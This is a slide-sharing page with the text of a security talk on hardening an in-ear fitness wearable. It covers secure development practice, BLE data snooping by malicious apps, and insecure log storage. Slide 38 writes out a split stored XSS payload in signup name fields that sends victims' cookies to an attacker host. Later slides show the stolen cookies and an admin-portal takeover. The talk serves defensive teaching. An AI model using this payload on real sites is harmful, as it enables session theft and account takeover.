securing your in ear fitness coach challenges in
play

Securing your in-ear fitness coach: Challenges in hardening next - PowerPoint PPT Presentation

Dec 25, 2023 •331 likes •826 views

Securing your in-ear fitness coach: Challenges in hardening next generation wearables Kavya Racharla Sumanth Naropanth Who are we? Kavya Racharla Security Research Manager Sports Group, Intel Oracle & Qualcomm

  1. Securing your in-ear fitness coach: Challenges in hardening next generation wearables 
 Kavya Racharla Sumanth Naropanth

  2. 
 Who are we? • Kavya Racharla • Security Research Manager — Sports Group, Intel • Oracle & Qualcomm • Sumanth Naropanth • Founder and CEO — Deep Armor • Intel, Palm/HP , Sun Microsystems • Security consulting, vulnerability testing, SDL and training services for emerging technologies • www.deeparmor.com | @deep_armor

  3. Security problems in New Devices How do we address them?

  4. Agenda Introduction to an in-ear fitness coach • Unshackling from traditional SDL methods • Securely designing a software fitness coach • Hardware, Firmware & Software paradigms • Ecosystem Security 
 • Real world problems - weaknesses and demos • Privacy 
 •

  5. IoT/Wearable Ecosystem Back End Services HTTP/HTTPS HTTP/HTTPS HTTP/HTTPS BT/BLE/WiFi/NFC Gateway Gateway Zigbee/Z-wave BT/BLE/NFC Node Node Node Node Node Node BLE/ANT+ Sensors Sensors Sensors Sensors

  6. Case Study: In-ear fitness coach Wearable = Comfortable Smart Untethered Continuous Learning Data/Analytics Better Quality of Life

  7. Securing an in-ear fitness coach

  8. Unshackling from traditional SDL

  9. Challenges: Securing a never-before gadget • Lack of tactical SDL frameworks for rapid time-to-market products with constantly evolving requirements • Diverse, non-standard and evolving communication protocols 
 • Weaknesses in adoption of protocol specifications 
 • Long lives for IoT products • Privacy 
 • Nascent research in IoT security

  10. Challenges - Technical • Collection of personal data and PII is higher • Geo-location information • Biometric data • Sensor data • Payment services • Limited SW stack —> security may get compromised • Often FW running on micro-controllers • Field updates are difficult • Asymmetric key crypto, TEEs, etc. are heavy • Multi-tier, multi-tenant product architecture • Cross-domain flows • Multiple exposure points as a consequence

  11. Proposal : Securing a never-before gadget • Next-gen SDL For IoT, wearable and cloud technologies. Especially when they all come together • Ecosystem security • Agile • • Security, Privacy and Legal woven into the development cycle • Leveraging industry standards 


  12. Introducing SPDL Security Code Threat Modeling Architecture Penetration Incident Reviews & Reviews Testing Response & Static Code Attack Trees Analysis Privacy Sign-off, Legal sign-off Privacy Req.; Data Privacy test Data 
 & Incident Access Review; Stakeholder cases & Plan Availability Response identification Product Development Lifecycle Launch Program Conception to Pre-Alpha Alpha Beta to Post Launch

  13. Designing SPDL

  14. Security topics Cloud Mobile Device IoT/Wearables

  15. Hardware & Firmware Security Paradigms Device Software Service layer Protocol Data Secure Erase Signed libraries security security sandboxing Key Secure Data At Rest Secure Secure Boot TEE Management FOTA Encryption Debug Port access restrictions Secure & lockdown Storage Device Hardware

  16. SW Security Paradigms: application SW Multi-app <—> multi-device Secure implementation: Spec and communication Code Secure storage of app specific data, keys, logs, databases and user App Store Scanning specific data Privacy: Opt-in/Opt-out policy 3rd Party SDK security enforcement HW backed keystore/keychain

  17. Cloud Software & Infrastructure Security Secure Key Management and Secure storage Provisioning of user and enterprise data, At Rest Encryption Web Portal User & Roles Infrastructure hardening Security (HTML/ management Secure configuration JS attacks Privacy: Data storage, sharing and retention policies Micro-services security Security DevOps

  18. Ecosystem security challenges Design weaknesses in Secure key negotiation comms protocol adoption and distribution Network Security Gateway/Node Updates Gateway/Node Updates Secure key negotiation and distribution Secure Provisioning Design weaknesses in comms protocol adoption

  19. Real world security problems

  20. Demo 1: Ecosystem Challenges

  21. Demo 1: Ecosystem overview HTTPS BT/BLE BT/BLE/ANT+ Back End Services

  22. Device communication Device Commands: • Put device into recovery mode • Do a FW update • Change Device (BLE) name Notifications : • Social apps • Calls and texts Information: • User activity data • User profile updates • Application action (calls, music control) • Call/text/social updates (sometimes)

  23. The Problem – Prelude Device Commands: • Put device into recovery mode • Do a FW update • Change Device (BLE) name Notifications: • Social apps • Calls and texts Information: • User activity data • User profile updates • Application action (calls, music - E D L E B T control) P Y R C • Call/text/social updates N E (sometimes) ATTACKER

  24. The Problem Device Commands: • Put device into recovery mode • Do a FW update • Change Device (BLE) name Notifications: • Social apps • Calls and texts Information: • User activity data • User profile updates • Application action (calls, music - E D L E B T control) P Y R C • Call/text/social updates N E (sometimes) ATTACKER

  25. Root Cause All applications on Android and iOS can subscribe to the BT service and get the data on the same BT channels or BLE characteristics as the legitimate app • Android android.permission.BLUETOOTH • android.permission.BLUETOOTH_ADMIN – quote: • • iOS • Core Bluetooth (CB) Framework • Centrals (client/phone) and Peripherals (server/wearable) classes

  26. Example – Wearable Ecosystem 1 • Uses BLE • Proprietary code • Existing market research for format of messages and headers • Malware app subscribes to the known BLE characteristics gets data synced with the legit app

  27. Example – Wearable Ecosystem 1

  28. Example – Wearable Ecosystem 2 • Similar, but with a twist • Malware application cannot send commands to the wearable by itself • Legitimate app opens a connection to the device • The malware app piggybacks to send commands to the wearable Moral: Partial security does not help • Protect not just the handshake but every message

  29. Example – Wearable Ecosystem 2

  30. Demo 2: Protecting User data in logs

  31. Demo 2: Environment Coach commentary Language definitions Dialogue definitions

  32. The Problem • Coach commentary, language definitions and dialogue stored as PLAIN TEXT files • FIT files and JSON files stored in public storage • Due to private storage limitations • Contains PII and IP • Attacker can tamper with or copy over the text files • DoS • Code execution • Accessible by malicious apps

  33. Our Recommendation • Avoid public storage whenever possible • Support for encryption • Keys must be user specific or application specific to prevent BORE • Support for signing dialogue files or any sensitive information in public storage • Capability to delete/ opt-out of dialogue logging • Cloud • App

  34. Demo 3: Admin portal takeover

  35. Demo 3: Ecosystem overview HTTPS BT/BLE User portal : Login and sign-up User portal : Connect with friends User portal : Comment on friends profile User portal : Profile and activity mgmt. Cloud Portal Admin portal : Remote Device mgmt. Admin portal : Data mgmt.

  36. Target : Sign-up and Profile pages

  37. Exploit Scenario Attacker uses the “friend request” functionality on user portal • • “Friend request” loads when victim logs into his/ her account • Victim takes no action to view the invite/accept the invite Attacker exploits a XSS vulnerability in the user portal/ sign-up pages • Uses two accounts to launch the attack • Gives 2X number of characters for the exploit code • Exploit code expandable up to 5 notifications (or 5 “friend” requests) •

  38. Exploit Scenario: The attack First Name: Arya<script>i=new Image();u= Last Name : navigator.userAgent</script> Email : arya@stark.com First Name: <script>i.src='http://x0?c=’ Last Name : +document.cookie+u</script>Jon Email : jon@stark.com

  39. Victim - logs in

  40. Attacker’s c&c Victim’s cookies and UA _ga=GA1.2.1543537304.1450072994; engageUser=ads9hnrfj7a3uhd9cnd8esa4g7; _gat=1; _ra=0.100149.1450085069; Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36

  41. Access to admin portal • Victim = Admin! • Cloud -> Remote device management ATTACKER’S BROWSER SEAMLESSLY LAUNCHES ALL PAGES OF THE VICTIM

  42. The Attack • Stolen admin credentials used to access admin portal • Remote device take-over • Unauthorized access to user profile data • Unintended access to user accounts • Malicious FW updates rolled-out • Several Security and privacy violations!

  43. Privacy • Live on your body or vicinity => access to wealth of PII/sensitive data • What is PII or personal data? 
 • Data Management • Collector/owner/processor/.. • 3rd party data access 
 • Data retention and deletion policies 


Recommend

Snow record &amp; pistes Coach travel UK &amp; Europe Ski clothing Pocket money Fitness &amp;

Snow record &amp; pistes Coach travel UK &amp; Europe Ski clothing Pocket money Fitness &amp;

Snow record &amp; pistes Coach travel UK &amp; Europe Ski clothing Pocket money Fitness &amp; resilience Hotel information Aprs ski &amp; free time Ski company and staff experiences Mr Symmons T Mrs Davison T Mr Statham T Miss Burrough

590 views • 24 slides
Tackling the Challenges of Securing the Cyber

Tackling the Challenges of Securing the Cyber

Tackling the Challenges of Securing the Cyber Space 1 ATLANTIC 9/9/2015 Cyber security challenges Na2onal Cybersecurity and Communica2ons Integra2on

276 views • 16 slides
NEW-U FITNESS (NUF) INC. PRESENTED BY: NATALIE I. LEON, CERTIFIED EXERCISE PHYSIOLOGIST &amp;

NEW-U FITNESS (NUF) INC. PRESENTED BY: NATALIE I. LEON, CERTIFIED EXERCISE PHYSIOLOGIST &amp;

NEW-U FITNESS (NUF) INC. PRESENTED BY: NATALIE I. LEON, CERTIFIED EXERCISE PHYSIOLOGIST &amp; HEALTH AND WELLNESS COACH (ACSM WELLCOACHES PROGRAM) *PICTURE LEFT: AMY SHERMAN, NUF NUTRITION &amp; FITNESS CLIENT. *PICTURE RIGHT: TORI NELSON, 2X

653 views • 20 slides
I like spending time with my family. I like going to the gym and taking on fitness challenges!

I like spending time with my family. I like going to the gym and taking on fitness challenges!

I have been teaching for almost 10 years, mostly in reception however I did train in year 2. I like spending time with my family. I like going to the gym and taking on fitness challenges! I also like watching films and eating chocolate!!!

497 views • 21 slides
SECTORAL PRESENTATION 2009 2010 CONFRONTING OUR CHALLENGES CONFRONTING OUR CHALLENGES

SECTORAL PRESENTATION 2009 2010 CONFRONTING OUR CHALLENGES CONFRONTING OUR CHALLENGES

SECTORAL PRESENTATION 2009 2010 CONFRONTING OUR CHALLENGES CONFRONTING OUR CHALLENGES SECURING OUR FUTURE SECURING OUR FUTURE 1 PRESENTED BY: HON. EDMUND BARTLETT, MP MINISTER OF TOURISM GORDON HOUSE KINGSTON TUESDAY, JUNE 30, 2009

1.88k views • 73 slides
10/15/2018 About Me Professional Certified Coach ( 900+ certified hours) MBTI and ELI

10/15/2018 About Me Professional Certified Coach ( 900+ certified hours) MBTI and ELI

10/15/2018 About Me Professional Certified Coach ( 900+ certified hours) MBTI and ELI Certified Practitioner 12 Years as Trade Association Executive Director Lifelong Entrepreneur (Apparel, Fitness, Coaching) Podcaster, The

325 views • 11 slides
THE COACHING STAFF Coach Gross Head boys coach, throwing events (ggross@geneva304.org)

THE COACHING STAFF Coach Gross Head boys coach, throwing events (ggross@geneva304.org)

THE COACHING STAFF Coach Gross Head boys coach, throwing events (ggross@geneva304.org) Coach Raak Head girls coach, distance events Coach Swaekauski Long, triple jumps Coach Emanual Sprints/High Jump Coach

399 views • 15 slides
1 A review of fitness Fitness has two components: 1. Viability; an individuals ability to

1 A review of fitness Fitness has two components: 1. Viability; an individuals ability to

Functional divergence 1: FFTNS and Shifting balance theory There is no conflict between neutralists and selectionists on the role of natural selection: Natural selection is the only explanation for adaptation 1 A review of fitness Fitness has

500 views • 27 slides
2. Two typical geometries of fitness landscapes Fitness landscape analysis for understanding and

2. Two typical geometries of fitness landscapes Fitness landscape analysis for understanding and

Multimodal fitness landscape Rugged fitness landscapes Neutral fitness landscapes Neutral Networks 2. Two typical geometries of fitness landscapes Fitness landscape analysis for understanding and designing local search heuristics S

615 views • 57 slides
Securing Digital Fintech Platform Value Proposition and Security Challenges Agus F. Abdillah

Securing Digital Fintech Platform Value Proposition and Security Challenges Agus F. Abdillah

Securing Digital Fintech Platform Value Proposition and Security Challenges Agus F. Abdillah Jakarta - 28 th Nov, 2018 1 Securing Fintech 1 Introduction 2 What Being Platform Means? AGENDA What is Value Proposition for Digital 3

353 views • 18 slides
FOOD FITNESS MINDSET www.staceygreenside.org ABOUT ME Wife and mother Formerly worked

FOOD FITNESS MINDSET www.staceygreenside.org ABOUT ME Wife and mother Formerly worked

FOOD FITNESS MINDSET www.staceygreenside.org ABOUT ME Wife and mother Formerly worked in corporate America for 16 years Full time fitness instructor and online food/fitness mentor Licensed to teach dance fitness, PiYo,

288 views • 13 slides
Securing and Maintaining Liability Protection Strategies for Overcoming BFPP Defense Challenges

Securing and Maintaining Liability Protection Strategies for Overcoming BFPP Defense Challenges

Presenting a live 90-minute webinar with interactive Q&amp;A CERCLA Bona Fide Prospective Purchaser Defense: Securing and Maintaining Liability Protection Strategies for Overcoming BFPP Defense Challenges and Restrictions TUESDAY, MARCH 28, 2017

826 views • 56 slides
My How To Get Flat Abs 4 Spring Break&quot; Coach Z Williams Here Myfitnesspal Mastery

My How To Get Flat Abs 4 Spring Break&quot; Coach Z Williams Here Myfitnesspal Mastery

MAX IMPACT FITNESS PRESENTS: My How To Get Flat Abs 4 Spring Break&quot; Coach Z Williams Here Myfitnesspal Mastery Goal To share with you my top 6 reasons why you should start using MyFitnessPal Today!!! This Is The One Tool That

781 views • 34 slides
W3: Individual Fitness Fitness Exercise Testing Pyschology Exercise Benchmark Sociology

W3: Individual Fitness Fitness Exercise Testing Pyschology Exercise Benchmark Sociology

W3: Individual Fitness Fitness Exercise Testing Pyschology Exercise Benchmark Sociology Asessments Healthy Fitness Zone AGENDA A1. Introduction to Fitness A2. Immediate Effects of Exercise A3. PE &amp; Safety A4. Healthy Fitness Zone

1.03k views • 55 slides
1. Basis of fitness landscape Fitness landscape analysis for understanding and designing local

1. Basis of fitness landscape Fitness landscape analysis for understanding and designing local

Optimisation Origin and definition of fitness landscape Position and goal 1. Basis of fitness landscape Fitness landscape analysis for understanding and designing local search heuristics S ebastien Verel LISIC - Universit e du Littoral

558 views • 44 slides
Top Ten Challenges of Securing Smart Infrastructure Niloufer Tamboly, CISSP, CCSP, CPA I am

Top Ten Challenges of Securing Smart Infrastructure Niloufer Tamboly, CISSP, CCSP, CPA I am

Top Ten Challenges of Securing Smart Infrastructure Niloufer Tamboly, CISSP, CCSP, CPA I am Niloufer Tamboly I am a risk management professional and help companies manage risk, execute cybersecurity strategy and accept risks appropriately

671 views • 22 slides
Security Challenges in the ASEAN Region Presentation to the Securing Asia Conference, London,

Security Challenges in the ASEAN Region Presentation to the Securing Asia Conference, London,

Security Challenges in the ASEAN Region Presentation to the Securing Asia Conference, London, 25-26 June, 2012 Amitav Acharya Professor of International Relations and Chair of the ASEAN Studies Center School of International Service American

337 views • 19 slides
Operation Fitness Personalized Health and Fitness Presented by Bishop-Lyons Entertainment

Operation Fitness Personalized Health and Fitness Presented by Bishop-Lyons Entertainment

Operation Fitness Personalized Health and Fitness Presented by Bishop-Lyons Entertainment Empower people to get in shape by customizing nutrition, health and fitness programs using technology and multiple distribution platforms and venues.

564 views • 34 slides
Position Paper: Challenges Towards Securing Hardware-assisted Execution Environments Zhenyu Ning 1

Position Paper: Challenges Towards Securing Hardware-assisted Execution Environments Zhenyu Ning 1

Position Paper: Challenges Towards Securing Hardware-assisted Execution Environments Zhenyu Ning 1 Fengwei Zhang 1 Weisong Shi 1 Larry Shi 2 1 Wayne State University 2 University of Houston November 21, 2019 1 Overview of The Talk Motivation

575 views • 24 slides
THE REAL FITNESS F I T N E S S M A N A G E M E N T A N D T R A I N I

THE REAL FITNESS F I T N E S S M A N A G E M E N T A N D T R A I N I

THEREALFITNESSUAE@GMAIL.COM THE REAL FITNESS F I T N E S S M A N A G E M E N T A N D T R A I N I N G START 01 Who Are We ? The Real Fitness is owned by Nabil Benhamouda ex-professional rugby player in French

174 views • 13 slides
Fitness + In-Memory Computing = Getting ahead of the game Craig Gresbrink Solutions Architect

Fitness + In-Memory Computing = Getting ahead of the game Craig Gresbrink Solutions Architect

Fitness + In-Memory Computing = Getting ahead of the game Craig Gresbrink Solutions Architect 24 Hour Fitness Who are we? 24 Hour Fitness is a leading fitness industry pioneer with more than 400 clubs across the United States. 24 Hour Fitness

355 views • 23 slides
Wellness 3C: Curriculum On Facts about Fitness Facts about Fitness Cardiorespiratory

Wellness 3C: Curriculum On Facts about Fitness Facts about Fitness Cardiorespiratory

Wellness 3C: Curriculum On Facts about Fitness Facts about Fitness Cardiorespiratory Flexibility Endurance Muscular Strength Body Composition Muscular Endurance HEALTH &amp; WELLNESS AGENDA C1. Fitness Component: Cardio-Respiratory

792 views • 39 slides
Structure Introduction Introduction Vitamin and mineral deficiencies (VMDs) Health

Structure Introduction Introduction Vitamin and mineral deficiencies (VMDs) Health

Slide 2 Plant and Crop Sciences Seminar fitness fitness (f t'n s) n. Farming for fitness: The state or condition of being the economics of putting physically sound and healthy, especially as the result of exercise and proper

350 views • 7 slides
IoT Security Image: xkcd How is securing IoT different from securing any other system? IoT

IoT Security Image: xkcd How is securing IoT different from securing any other system? IoT

IoT Security Image: xkcd How is securing IoT different from securing any other system? IoT is a system of systems, with A great deal of heterogeneity (sensing, computation, communication, energy) New types of devices appearing all

1.35k views • 65 slides

More recommend